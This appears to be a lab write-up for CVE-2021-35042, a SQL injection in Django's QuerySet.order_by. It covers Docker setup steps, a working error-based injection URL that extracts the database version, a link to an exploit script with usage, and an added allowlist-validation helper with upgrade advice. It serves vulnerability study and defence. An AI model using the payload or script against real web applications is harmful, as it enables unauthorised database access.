Django 3.1.x before 3.1.13 and 3.2.x before 3.2.5 allows QuerySet.order_by SQL injection if order_by is untrusted input from a client of a web application.
Django 3.1.x before 3.1.13
Django 3.2.x before 3.2.5
Vulnerable environment
https://github.com/errorecho/CVEs/tree/main/CVE-2021-35042/Env
Run the vulnerable environment
docker-compose build
docker-compose up -d
Open http://127.0.0.1:8000/vuln/?order=id to confirm that the environment is running.
http://127.0.0.1:8000/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23
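One way to close this at the application layer, whatever the Django version, is to map the client's order value onto an allowlist before it reaches order_by. This is an added example, not code from the lab repository; the safe_ordering helper, the InvalidOrdering exception, the field names in ALLOWED_ORDER_FIELDS and the Collection model name are assumptions.

```python
import re

# Assumption: the only columns this view lets a client sort by.
ALLOWED_ORDER_FIELDS = frozenset({"id", "name"})

# One optional leading '-' (descending), then a plain identifier. No dots,
# parentheses, semicolons, quotes or whitespace can pass this pattern.
_TERM_RE = re.compile(r"-?[A-Za-z_][A-Za-z0-9_]*")


class InvalidOrdering(ValueError):
    """The client-supplied ordering is not on the allowlist."""


def safe_ordering(raw, allowed=ALLOWED_ORDER_FIELDS, default=("id",)):
    """Convert an untrusted ?order= value into arguments for order_by()."""
    if raw is None or not raw.strip():
        return list(default)
    terms = []
    for term in (t.strip() for t in raw.split(",")):
        if not _TERM_RE.fullmatch(term):
            raise InvalidOrdering(f"illegal ordering term: {term!r}")
        if term.lstrip("-") not in allowed:
            raise InvalidOrdering(f"field is not sortable: {term!r}")
        terms.append(term)
    return terms


# In a Django view (Collection is a hypothetical model name):
#     try:
#         qs = Collection.objects.order_by(*safe_ordering(request.GET.get("order")))
#     except InvalidOrdering:
#         return HttpResponseBadRequest("invalid order parameter")

if __name__ == "__main__":
    # Constructed inputs; the last is the URL-decoded order value shown above.
    samples = [
        "id",
        "-name,id",
        "vuln_collection.name",
        "vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)#",
    ]
    for s in samples:
        try:
            print(repr(s), "->", safe_ordering(s))
        except InvalidOrdering as exc:
            print(repr(s), "-> rejected:", exc)
```

Upgrading to 3.1.13 or 3.2.5 remains the fix for the framework itself; the allowlist keeps untrusted values out of order_by regardless.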
Exploit script
https://github.com/errorecho/CVEs/blob/main/CVE-2021-35042/Exp/exp.sh
Usage
./exp.sh http://127.0.0.1:8000/vuln/